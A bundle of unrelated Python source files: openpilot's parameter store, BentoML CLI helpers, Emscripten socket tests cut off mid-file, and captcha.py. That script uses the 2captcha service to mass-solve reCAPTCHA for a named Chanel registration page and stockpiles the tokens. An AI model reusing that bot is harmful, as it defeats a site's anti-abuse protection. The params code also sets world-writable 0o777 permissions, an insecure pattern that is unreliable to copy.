fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, type, value, traceback): pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, type, value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path+"/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db+"/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
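
# A short usage sketch (illustrative only; the key must be one of the entries in `keys`
# above, and the value shown here is made up): get() may block until a value exists,
# put() always blocks until the data is fsync'd, and put_nonblocking() pushes that
# blocking write onto a background thread.
def _example_params_usage():
  params = Params()
  params.put("DongleId", "0123456789abcdef")
  dongle_id = params.get("DongleId", encoding='utf8')
  t = put_nonblocking("DongleId", dongle_id)
  t.join()
  return dongle_id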
if __name__ == "__main__":
params = Params()
if len(sys.argv) > 2:
params.put(sys.argv[1], sys.argv[2])
else:
for k in keys:
pp = params.get(k)
if pp is None:
print("%s is None" % k)
elif all(chr(c) in string.printable for c in pp):
print("%s = %s" % (k, pp))
else:
print("%s = %s" % (k, binascii.hexlify(pp)))
# Test multiprocess:
# seq 0 100000 | xargs -P20 -I{} python common/params.py DongleId {} && sleep 0.05
# while python common/params.py DongleId; do sleep 0.05; done
|
utils.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import sys
import threading
import itertools
import time
import logging
from datetime import datetime
import humanfriendly
from tabulate import tabulate
from bentoml.cli.click_utils import _echo
from bentoml.utils import pb_to_yaml
from bentoml.exceptions import BentoMLException
logger = logging.getLogger(__name__)
class Spinner:
def __init__(self, message, delay=0.1):
self.spinner = itertools.cycle(['-', '/', '|', '\\'])
self.delay = delay
self.busy = False
self._screen_lock = None
self.thread = None
self.spinner_visible = False
sys.stdout.write(message)
def write_next(self):
with self._screen_lock:
if not self.spinner_visible:
sys.stdout.write(next(self.spinner))
self.spinner_visible = True
sys.stdout.flush()
def remove_spinner(self, cleanup=False):
with self._screen_lock:
if self.spinner_visible:
sys.stdout.write('\b')
self.spinner_visible = False
if cleanup:
sys.stdout.write(' ') # overwrite spinner with blank
                sys.stdout.write('\r') # return the cursor to the start of the line
sys.stdout.flush()
def spinner_task(self):
while self.busy:
self.write_next()
time.sleep(self.delay)
self.remove_spinner()
def __enter__(self):
if sys.stdout.isatty():
self._screen_lock = threading.Lock()
self.busy = True
self.thread = threading.Thread(target=self.spinner_task)
self.thread.start()
def __exit__(self, exception, value, tb):
if sys.stdout.isatty():
self.busy = False
self.remove_spinner(cleanup=True)
else:
sys.stdout.write('\r')
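
# Usage sketch (illustrative only): Spinner is used as a context manager; the animation
# runs on a background thread while the body executes, and only when stdout is a TTY.
def _example_spinner_usage():
    with Spinner("Working... "):
        time.sleep(1)  # stand-in for real work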
def parse_key_value_pairs(key_value_pairs_str):
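    """Parse a "key1=value1,key2=value2" string into a dict (illustrative example:
    "env=prod, region=us-west" -> {"env": "prod", "region": "us-west"})."""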
result = {}
if key_value_pairs_str:
for key_value_pair in key_value_pairs_str.split(','):
key, value = key_value_pair.split('=')
key = key.strip()
value = value.strip()
if key in result:
logger.warning("duplicated key '%s' found string map parameter", key)
result[key] = value
return result
def echo_docker_api_result(docker_generator):
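    """Stream human-readable lines from a Docker API result generator (e.g. a docker-py
    build/push call), aggregating per-layer push progress into "Pushed X / Y" lines and
    raising BentoMLException if an errorDetail entry appears."""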
layers = {}
for line in docker_generator:
if "stream" in line:
cleaned = line['stream'].rstrip("\n")
if cleaned != "":
yield cleaned
if "status" in line and line["status"] == "Pushing":
progress = line["progressDetail"]
layers[line["id"]] = progress["current"], progress["total"]
cur, total = zip(*layers.values())
cur, total = (
humanfriendly.format_size(sum(cur)),
humanfriendly.format_size(sum(total)),
)
yield f"Pushed {cur} / {total}"
if "errorDetail" in line:
error = line["errorDetail"]
raise BentoMLException(error["message"])
def _print_deployment_info(deployment, output_type):
if output_type == 'yaml':
_echo(pb_to_yaml(deployment))
else:
from google.protobuf.json_format import MessageToDict
deployment_info = MessageToDict(deployment)
if deployment_info['state'] and deployment_info['state']['infoJson']:
deployment_info['state']['infoJson'] = json.loads(
deployment_info['state']['infoJson']
)
_echo(json.dumps(deployment_info, indent=2, separators=(',', ': ')))
def _format_labels_for_print(labels):
if not labels:
return None
result = [f'{label_key}:{labels[label_key]}' for label_key in labels]
return '\n'.join(result)
def _format_deployment_age_for_print(deployment_pb):
if not deployment_pb.created_at:
# deployments created before version 0.4.5 don't have created_at field,
# we will not show the age for those deployments
return None
else:
return human_friendly_age_from_datetime(deployment_pb.created_at.ToDatetime())
def human_friendly_age_from_datetime(dt, detailed=False, max_unit=2):
return humanfriendly.format_timespan(datetime.utcnow() - dt, detailed, max_unit)
def _print_deployments_table(deployments, wide=False):
from bentoml.yatai.proto.deployment_pb2 import DeploymentState, DeploymentSpec
table = []
if wide:
headers = [
'NAME',
'NAMESPACE',
'PLATFORM',
'BENTO_SERVICE',
'STATUS',
'AGE',
'LABELS',
]
else:
headers = ['NAME', 'NAMESPACE', 'PLATFORM', 'BENTO_SERVICE', 'STATUS', 'AGE']
for deployment in deployments:
row = [
deployment.name,
deployment.namespace,
DeploymentSpec.DeploymentOperator.Name(deployment.spec.operator)
.lower()
.replace('_', '-'),
f'{deployment.spec.bento_name}:{deployment.spec.bento_version}',
DeploymentState.State.Name(deployment.state.state)
.lower()
.replace('_', ' '),
_format_deployment_age_for_print(deployment),
]
if wide:
row.append(_format_labels_for_print(deployment.labels))
table.append(row)
table_display = tabulate(table, headers, tablefmt='plain')
_echo(table_display)
def _print_deployments_info(deployments, output_type):
if output_type == 'table':
_print_deployments_table(deployments)
elif output_type == 'wide':
_print_deployments_table(deployments, wide=True)
else:
for deployment in deployments:
_print_deployment_info(deployment, output_type)
|
captcha.py
|
# coding=utf-8
import random
import sys
import threading
import time
import requests, json, datetime, time, BeautifulSoup, pickle
# How many threads?
Hthreads = 10
sitekeyEnabled = False
repeat = True
repeatTime = '17:30' #end of the loop
# To add: make the number of runs configurable (currently just the True/False `repeat` flag);
# d holds the current hour and minute in the format '16:18'.
#######
CaptchaList = []
active_threads = 0
sitekey = '6LdMmTkUAAAAABXe8KxK5NkZoXcwa1OCPx5XfRVf'
API_KEY = '' # ENTER YOUR API KEY
captcha_url = 'http://www.chanelatcolette.fr/en/mail-register/'
headers = {'User-Agent': 'Mozilla/5.0'}  # assumed default; the original never defined `headers`, but get_sitekey() uses it
def main():
global CaptchaList
global sitekey
global API_KEY
global captcha_url
global headers
log('Welcome')
if sitekeyEnabled == True:
        log('Retrieving Sitekey')
sitekey = get_sitekey(captcha_url)
d = datetime.datetime.now().strftime('%H:%M') # print -> 16:18
# Shitty coding
if repeat == True:
while not str(d) == repeatTime:
for i in range(0,Hthreads):
t = threading.Thread(target=get_captcha, args=(API_KEY,sitekey,captcha_url))
t.daemon = True
t.start()
time.sleep(0.1)
            # This inner loop keeps the outer repeatTime loop from ending while worker
            # threads are still running (wait until at most one worker is left).
            timeout = []
            while not (active_threads == 0 or active_threads == 1):
                log('Active Threads ---------- ' + str(active_threads))
                timeout.append(active_threads)
                if timeout.count(active_threads) == 10:
                    break
                time.sleep(5)
d = datetime.datetime.now().strftime('%H:%M')
timeout = []
else:
for i in range(0,Hthreads):
t = threading.Thread(target=get_captcha, args=(API_KEY,sitekey,captcha_url))
t.daemon = True
t.start()
time.sleep(0.1)
        timeout = []
        while not (active_threads == 0 or active_threads == 1):
            log('Active Threads ---------- ' + str(active_threads))
            timeout.append(active_threads)
            if timeout.count(active_threads) == 20:
                break
            time.sleep(5)
    # Tests only, to check that saving works correctly
"""print CaptchaList
d = datetime.datetime.now().strftime('%H:%M')
with open(str(d)+'.txt','r') as f:
trump = pickle.load(f)
item = random.choice(trump)
print trump
print item"""
def log(event):
print('Captcha by Azerpas :: ' + str(datetime.datetime.now().strftime('%H:%M:%S')) + ' :: ' + str(event))
def get_sitekey(url):
if sitekeyEnabled == False:
log('Sitekey scraping is disabled, using the default value')
else:
session = requests.session()
log('Scraping sitekey')
session.get(url, headers=headers)
        ##### finding captcha sitekey with BeautifulSoup ####
    # Scraping is not implemented above, so fall back to the module-level default so
    # that main() still gets a usable value.
    return sitekey
def get_captcha(API_KEY,sitekey,captcha_url):
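    # Submits the sitekey and page URL to 2captcha's in.php endpoint, then polls res.php
    # until the solved token is ready, and finally hands the token to saveCaptcha().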
global active_threads
active_threads += 1
session = requests.session()
session.cookies.clear()
randomID = random.getrandbits(16)
log('Generating Captcha for task ID: ' + str(randomID))
captcha_id = session.post("http://2captcha.com/in.php?key={}&method=userrecaptcha&googlekey={}&pageurl={}".format(API_KEY, sitekey, captcha_url)).text.split('|')[1]
recaptcha_answer = session.get("http://2captcha.com/res.php?key={}&action=get&id={}".format(API_KEY, captcha_id)).text
while 'CAPCHA_NOT_READY' in recaptcha_answer:
print(recaptcha_answer)
time.sleep(3)
recaptcha_answer = session.get("http://2captcha.com/res.php?key={}&action=get&id={}".format(API_KEY, captcha_id)).text
try:
recaptcha_answer = recaptcha_answer.split('|')[1]
except IndexError:
print("Captcha error")
return
log('Captcha successfully obtained, task ID: ' + str(randomID))
saveCaptcha(recaptcha_answer,randomID)
log('Task ID ' + str(randomID) + ' is closing...')
active_threads -= 1
def saveCaptcha(recaptcha_answer, ID):
d = datetime.datetime.now().strftime('%H:%M')
log("Saving Captcha into '" + str(d) + ".txt', valid for 2 minutes")
try :
file = open(str(d)+'.txt','r')
print('Txt already exists, task ID: ' + str(ID))
try:
Filelist = pickle.load(file)
except EOFError:
print("--------------------")
print("Captcha error")
print("--------------------")
return
Filelist.append(recaptcha_answer)
file = open(str(d)+'.txt','w')
pickle.dump(Filelist,file)
#file.write(Filelist)
#file.write(str(recaptcha_answer))
#file.write('\n')
except IOError as e:
print('Creating txt, task ID: ' + str(ID))
file = open(str(d)+'.txt','w')
Filelist = []
Filelist.append(recaptcha_answer)
#file.write(Filelist)
pickle.dump(Filelist,file)
#file.write('\n')
    print('Captcha successfully saved, task ID: ' + str(ID))
CaptchaList.append(recaptcha_answer)
if __name__ == "__main__":
main()
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import multiprocessing
import os
import socket
import shutil
import sys
import time
import unittest
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner.py sockets')
try:
import websockify
except Exception:
# websockify won't successfully import on Windows under Python3, because socketserver.py doesn't export ForkingMixIn.
# (On python2, ForkingMixIn was exported but it didn't actually work on Windows).
# Swallowing the error here means that this file can always be imported, but won't work if actually used on Windows,
# which is the same behavior as before.
pass
import clang_native
from runner import BrowserCore, no_windows, chdir
from tools import shared
from tools.shared import PYTHON, EMCC, NODE_JS, path_from_root, Popen, PIPE, WINDOWS, run_process, run_js, JS_ENGINES, CLANG_CC
npm_checked = False
NPM = os.path.join(os.path.dirname(NODE_JS[0]), 'npm.cmd' if WINDOWS else 'npm')
def clean_processes(processes):
for p in processes:
if (not hasattr(p, 'exitcode') or p.exitcode is None) and (not hasattr(p, 'returncode') or p.returncode is None):
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except OSError:
pass
time.sleep(1)
    # ask again immediately afterwards; if the process did not die before, this should clean it up.
    try:
      p.terminate() # note: still SIGTERM; p.kill() would be required for a hard SIGKILL
except OSError:
pass
class WebsockifyServerHarness(object):
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
proc = run_process([CLANG_CC, path_from_root('tests', self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + clang_native.get_clang_native_args() + self.args, clang_native.get_clang_native_env(), stdout=PIPE, stderr=PIPE)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen([os.path.abspath('server')])
self.processes.append(process)
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except IOError:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness(object):
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([PYTHON, EMCC, path_from_root('tests', self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(NODE_JS + ['server.js'])
self.processes.append(process)
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
# Executes a native executable server process
class BackgroundServerProcess(object):
def __init__(self, args):
self.processes = []
self.args = args
def __enter__(self):
print('Running background server: ' + str(self.args))
process = Popen(self.args)
self.processes.append(process)
def __exit__(self, *args, **kwargs):
clean_processes(self.processes)
def NodeJsWebSocketEchoServerProcess():
return BackgroundServerProcess(NODE_JS + [path_from_root('tests', 'websocket', 'nodejs_websocket_echo_server.js')])
def PythonTcpEchoServerProcess(port):
return BackgroundServerProcess([PYTHON, path_from_root('tests', 'websocket', 'tcp_echo_server.py'), port])
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(cls):
super(sockets, cls).setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
# Use emscripten root for node module lookup. This is needed because the unit tests each
# run with CWD set to a temporary directory outside the emscripten tree.
print('Setting NODE_PATH=' + path_from_root('node_modules'))
os.environ['NODE_PATH'] = path_from_root('node_modules')
def test_sockets_echo(self, extra_args=[]):
sockets_include = '-I' + path_from_root('tests', 'sockets')
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use consecutive server listen ports,
# because server teardown might not occur deterministically (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port addresses. If adding new tests,
# increment the used port addresses below.
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49161), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49162), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1'], 49163), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49160), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, sockets_include])
def test_sockets_echo_pthreads(self, extra_args=[]):
self.test_sockets_echo(['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_sdl2_sockets_echo(self):
harness = CompiledServerHarness('sdl2_net_server.c', ['-s', 'USE_SDL=2', '-s', 'USE_SDL_NET=2'], 49164)
with harness:
self.btest('sdl2_net_client.c', expected='0', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
def test_sockets_async_echo(self):
# Run with ./runner.py sockets.test_sockets_async_echo
sockets_include = '-I' + path_from_root('tests', 'sockets')
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ASYNC=1'], 49167), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1', '-DTEST_ASYNC=1'], 49168), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1', '-DTEST_ASYNC=1'], 49169), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_ASYNC=1'], 49166), 0)]
for harness, datagram in harnesses:
print('harness:', harness)
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, '-DTEST_ASYNC=1', sockets_include])
# Deliberately attempt a connection on a port that will fail to test the error callback and getsockopt
print('expect fail')
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=49169', '-DTEST_ASYNC=1', sockets_include])
def test_sockets_echo_bigdata(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
message += str(chr(ord('a') + (i % 26)))
# re-write the client test with this literal (it's too big to pass via command line)
input_filename = path_from_root('tests', 'sockets', 'test_sockets_echo_client.c')
input = open(input_filename).read()
output = input.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message)
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49172), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49173), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49171), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(output, expected='0', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], force_c=True)
@no_windows('This test is Unix-specific.')
@unittest.skip('fails on python3 - ws library may need to be updated')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_partial_client.c'), expected='165', args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_down_client.c'), expected='266', args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_closes_connection_client_rw.c'), expected='266', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete('enet')
shutil.copytree(path_from_root('tests', 'enet'), 'enet')
with chdir('enet'):
run_process([PYTHON, path_from_root('emconfigure.py'), './configure'])
run_process([PYTHON, path_from_root('emmake.py'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + path_from_root('tests', 'enet', 'include')]
for harness in [
CompiledServerHarness(os.path.join('sockets', 'test_enet_server.c'), enet, 49210)
]:
with harness:
self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=enet + ['-DSOCKK=%d' % harness.listen_port])
  # This test is no longer in use for WebSockets as we can't truly emulate
  # a server in the browser (in the past, there were some hacks to make it
  # somewhat work, but those have been removed). However, WebRTC should make it
  # possible to resurrect this test.
# def test_enet_in_browser(self):
# shared.try_delete('enet')
# shutil.copytree(path_from_root('tests', 'enet'), 'enet')
# pwd = os.getcwd()
# os.chdir('enet')
# run_process([PYTHON, path_from_root('emconfigure'), './configure'])
# run_process([PYTHON, path_from_root('emmake'), 'make'])
# enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + path_from_root('tests', 'enet', 'include')]
# os.chdir(pwd)
# run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_enet_server.c'), '-o', 'server.html', '-DSOCKK=2235'] + enet)
# def make_relay_server(port1, port2):
# print('creating relay server on ports %d,%d' % (port1, port2), file=sys.stderr)
# proc = run_process([PYTHON, path_from_root('tests', 'sockets', 'socket_relay.py'), str(port1), str(port2)])
# return proc
# with WebsockifyServerHarness('', [], 2235, 2234):
# with WebsockifyServerHarness('', [], 2237, 2236):
# pids = []
# try:
# proc = make_relay_server(2234, 2236)
# pids.append(proc.pid)
# self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=['-DSOCKK=2237', '-DUSE_IFRAME=1'] + enet)
# finally:
# clean_pids(pids);
def test_webrtc(self): # XXX see src/settings.js, this is disabled pending investigation
self.skipTest('WebRTC support is not up to date.')
host_src = 'webrtc_host.c'
peer_src = 'webrtc_peer.c'
host_outfile = 'host.html'
peer_outfile = 'peer.html'
host_filepath = path_from_root('tests', 'sockets', host_src)
temp_host_filepath = os.path.join(self.get_dir(), os.path.basename(host_src))
with open(host_filepath) as f:
host_src = f.read()
with open(temp_host_filepath, 'w') as f:
f.write(self.with_report_result(host_src))
peer_filepath = path_from_root('tests', 'sockets', peer_src)
temp_peer_filepath = os.path.join(self.get_dir(), os.path.basename(peer_src))
with open(peer_filepath) as f:
peer_src = f.read()
with open(temp_peer_filepath, 'w') as f:
f.write(self.with_report_result(peer_src))
open(os.path.join(self.get_dir(), 'host_pre.js'), 'w').write('''
var Module = {
webrtc: {
broker: 'http://localhost:8182',
session: undefined,
onpeer: function(peer, route) {
window.open('http://localhost:8888/peer.html?' + route);
// iframe = document.createElement("IFRAME");
// iframe.setAttribute("src", "http://localhost:8888/peer.html?" + route);
// iframe.style.display = "none";
// document.body.appendChild(iframe);
peer.listen();
},
onconnect: function(peer) {
},
ondisconnect: function(peer) {
},
onerror: function(error) {
console.error(error);
}
},
setStatus: function(text) {
console.log('status: ' + text);
}
};
''')
open(os.path.join(self.get_dir(), 'peer_pre.js'), 'w').write('''
var Module = {
webrtc: {
broker: 'http://localhost:8182',
session: window.location.toString().split('?')[1],
onpeer: function(peer, route) {
peer.connect(Module['webrtc']['session']);
},
onconnect: function(peer) {
},
ondisconnect: function(peer) {
// Calling window.close() from this handler hangs my browser, so run it in the next turn
